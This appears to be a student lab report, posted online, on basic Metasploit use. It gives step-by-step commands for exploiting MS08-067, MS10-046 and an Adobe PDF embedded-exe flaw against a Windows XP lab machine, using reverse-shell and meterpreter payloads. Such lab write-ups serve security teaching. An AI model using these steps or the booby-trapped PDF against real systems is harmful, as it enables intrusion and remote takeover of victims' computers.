20145239杜文超《网络攻防》- MSF基础应用
20145239杜文超《网络攻防》- MSF基础应用
基础问题回答
1、用自己的话解释什么是exploit,payload,encode?
- exploit:实现攻击行为的主体,但没有载荷只是一个空壳。没有子弹的枪是很好的比喻。
- payload:载荷。一般指shellcode,攻击成功后需要运行的东西。
- encode:编码器。使得我们的攻击中不会出现“坏字符”,也可以通过编码改变特征码,实现免杀。
实验总结与体会
msf仅仅是一个攻击平台,攻击具体的实现还是要靠抓住靶机上的漏洞进行。本次实验我对metasploit的体系结构有了初步的认识。尤其是对6个主要模块的功能和用途有了深入理解和实践经验。我也深刻的认识到在现实中想要真正攻陷一台靶机还是有难度的,因为本次实验我使用的靶机是win xp sp3英文版系统。很老,应该算是被淘汰的了,所以才会有那么多漏洞让我可以抓住去攻击,现在windows版本不断更新,漏洞补丁的更新速度也越来越快,因此更体现出了0 day漏洞的价值。
实验过程
实验环境配置
攻击机:Kali(IP:192.168.248.128)
靶机:Windows XP SP3(IP:192.168.248.129)
MS08_067漏洞渗透攻击
1、先用search ms08_067指令查询该攻击模块。

2、输入use exploit/windows/smb/ms08_067_netapi使用该模块,并用show payloads指令查看一下要用的payload。

3、输入set payload generic/shell_reverse_tcp设置一下payload,通过反向连接获取shell。

4、使用show options指令查看需要进行的配置。

5、如图所示进行配置,设置RHOST为远程靶机IP地址、LHOST为主机IP地址。

6、设置完成后再次确认刚才的设置。

7、输入exploit发起攻击。

8、攻击成功,成功获取靶机系统shell。

对浏览器攻击:ms10_046漏洞攻击
1、先利用search ms10_046指令查看可以运用的攻击模块.

2、使用该漏洞进行攻击。

3、设置相关参数。SRVHOST是本地监听主机的IP地址,LHOST是监听的IP地址,都填攻击者本机IP地址。

4、发起攻击,可以看到,生成了url链接地址。

5、我们使用靶机的IE浏览器登陆一下刚才生成的url地址。

6、发现主机这边已经攻击成功了。

7、使用命令sessions -i 1开始连接,成功得到shell。

对Adobe的漏洞攻击:adobe_pdf_embedded_exe
1、进入文件攻击目录选择一个合适的adobe漏洞。

2、我选择的是adobe_pdf_embedded_exe,use这个漏洞。
3、设置一下payload攻击有效载荷:set payload windows/meterpreter/reverse_tcp

4、show options查看需要进行哪些配置。

5、设置文件名称5239.pdf,LHOST为攻击者主机IP。

6、再次使用show options检查配置。

7、发起攻击。发现生成了一个名为5239的pdf文件。

8、把攻击主机设置为监听状态,方法和以前的实验类似。

9、将该pdf拷贝到靶机上然后打开。

10、攻击机已经成功获取到靶机shell。

辅助模块的应用:scanner/http/dir_listing
1、先用search了解一下有关scanner/http/dir_listing的相关信息。

2、设置相关参数。

3、run,运行成功。

20145239杜文超《网络攻防》- MSF基础应用的更多相关文章
- 20145239杜文超《网络对抗》- Web安全基础实践
20145239杜文超<网络对抗>- Web安全基础实践 基础问题回答 (1)SQL注入攻击原理,如何防御? SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查 ...
- 20145239杜文超《网络对抗》- Web基础
20145239杜文超<网络对抗>- Web基础 基础问题回答 1.什么是表单? 表单是一个包含表单元素的区域. 表单元素是允许用户在表单中(比如:文本域.下拉列表.单选框.复选框等等)输 ...
- 20145239杜文超《网络对抗》- shellcode注入&Return-to-libc攻击深入
20145239杜文超<网络对抗>- shellcode注入&Return-to-libc攻击深入 shellcode基础知识 Shellcode是一段代码,作为数据发送给受攻击服 ...
- 20145239 杜文超 实验四 Android开发基础
20145239实验四 Android开发基础 实验内容 基于Android Studio开发简单的Android应用并部署测试 了解Android组件.布局管理器的使用 掌握Android中事件处理 ...
- 20145239杜文超 实验五 Java网络编程
20145239 实验五 Java网络编程 实验内容 组队,一人服务器,一人客户端. 下载加解密代码,先编译运行代码,一人加密一人解密,适当修改代码. 然后集成代码,一人加密后通过TCP发送,加密使用 ...
- 20145239杜文超 《Java程序设计》第10周学习总结
20145239 <Java程序设计>第10周学习总结 教材学习内容总结 Java的网络编程 网络编程 网络编程就是在两个或两个以上的设备(例如计算机)之间传输数据. 网络概述 1.计算机 ...
- 20145239杜文超 《Java程序设计》第8周学习总结
20145239 <Java程序设计>第8周学习总结 教材学习内容总结 通用API 日志API 1.java.util.logging包提供了日志功能相关类与接口,使用日志的起点是logg ...
- 20145239杜文超 《Java程序设计》实验二 Java面向对象程序设计实验报告
20145239 <Java程序设计>实验二 Java面向对象程序设计实验报告 实验内容 初步掌握单元测试和TDD 理解并掌握面向对象三要素:封装.继承.多态 初步掌握UML建模 熟悉S. ...
- 20145239杜文超 《Java程序设计》第4周学习总结
20145239 <Java程序设计>第4周学习总结 教材学习内容总结 第六章: 继承:避免多个类间重复定义共同行为.即当多个类中存在相同属性和行为时,将这些内容抽取到单独一个类中,那么多 ...
随机推荐
- windows下用py2exe打包脚本为可双击运行程序
文件夹结构: ├── readme.txt ├── settings.py #程序参数 ├── settings.pyc ├── setup.py #安装文件 ├── spider.ico ...
- CentOS6.X 升级内核至 3.10
1.1 查看当前版本 [root@localhost ~]# uname -r -.el6.x86_64 1.2 导入public key [root@localhost ~]# rpm --impo ...
- SQL 基本关键字 函数 关联 连接
http://www.w3cschool.cn/sql_having.html w3c中有些SQL的讲解 1 order by 排序 SELECT Company, OrderNumber FROM ...
- UTI iPhone支持依文件后缀名打开应用
本文转载至 http://blog.csdn.net/zaitianaoxiang/article/details/6658492 iphoneapplicationprocessingfileurl ...
- CodeIgniter框架——访问方式 URI 分配变量 数据库操作
1.访问方式: CodeIgniter 的访问URL使用的是pathinfo,入口文件/控制器/方法(/参数列表) eg:localhost/index.php/welcome/index/id 第一 ...
- 【BZOJ4325】NOIP2015 斗地主 搜索+剪枝
[BZOJ4325]NOIP2015 斗地主 Description 牛牛最近迷上了一种叫斗地主的扑克游戏.斗地主是一种使用黑桃.红心.梅花.方片的A到K加上大小王的共54张牌来进行的扑克牌游戏.在斗 ...
- Tarjan 求桥,割,强连通
最近遇到了这种模板题,记录一下 tarjan求桥,求割 #include <bits/stdc++.h> using namespace std; #define MOD 99824435 ...
- Highway
Highway Accepted : 78 Submit : 275 Time Limit : 4000 MS Memory Limit : 65536 KB Highway In ICPCC ...
- OAuth授权
重新梳理下授权认证模式. OWIN OWIN的英文全称是Open Web Interface for .NET.OWIN是针对.NET平台的开放Web接口. https://blog.csdn.net ...
- Power Systems 虚拟化简介
本文向您详细地介绍了 Power System 虚拟化相关的技术和亮点,让您对这些最新的虚拟化技术有一个全面的了解.本文来自 IBM Systems Magazine for AIX 中文版. 自从引 ...
